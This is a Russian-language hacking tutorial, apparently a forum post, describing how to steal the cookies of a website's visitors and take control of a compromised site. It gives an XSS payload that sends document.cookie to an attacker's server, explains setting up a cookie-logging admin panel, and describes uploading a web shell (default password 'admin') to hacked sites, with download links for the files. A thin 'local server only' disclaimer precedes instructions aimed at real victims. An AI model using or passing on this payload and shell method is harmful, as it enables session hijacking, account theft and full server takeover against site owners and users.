ВНИМАНИЕ! АВТОР НЕ ПРИЗЫВАЕТ ПОВТОРЯТЬ ПОДОБНОЕ НА РЕАЛЬНЫХ САЙТАХ. ТОЛЬКО НА ЛОКАЛЬНОМ СЕРВЕРЕ, ИБО ЭТО СТАТЬЯ ТОЛЬКО ДЛЯ ОЗНАКОМЛЕНИЯ, И ЭТО УГОЛОВНО НАКАЗУЕМО. Всем привет, сегодня я расскажу как получать все куки пользователей, зашешдших на ваш сайт( и полный контроль если вы взломали сайт.) Нам понадобятся: 1) Мозги 2) Свой сайт или взломанный сайт лично вами (хацкеры ебать) Приступим Кидаем на сервер ниже файлы, их 4. Их надо слегка изменить в файле admin.php логин и пароль и в файле index.html на ваш сайт. Дальше заходим в браузер и пишем: https://yoursite.ru/admin.php . Вот скрин входа в панельку : Как ввели логин и пароль, заходим, в панельку: Дальше делаем инъекцию на сайте посредством xss и вводим следующее: <script>location.href='http://вашсайт/с.php?c='+escape(document.cookie)</script> </body> PHP <script>location.href='http://вашсайт/с.php?c='+escape(document.cookie)</script> </body> и в принципе все. Кидаем жертве линк на свой сайт и чекаем панель, а если на взломанном сайте, то **** будут сами идти. Вот скрин лога: Ну а если вы взломали нн сайт, то заливаем шелл, в загрузках он так и называется shell. Дальше вводим в браузере https://взломаныйсайт/shell.php и вводим пароль от шелла( по дефолту он admin) Вот скрин входа в шелл: Дальше просто развлекайтесь с сайтом, ибо шелл позволяет делать все что хотите, даже инфицировать все .php файлы на сервере. Скрин шелла: Вот ссылки на все файлы в статье, для удобства залил на яндекс диск и сендспейс #АвторскаяСтатья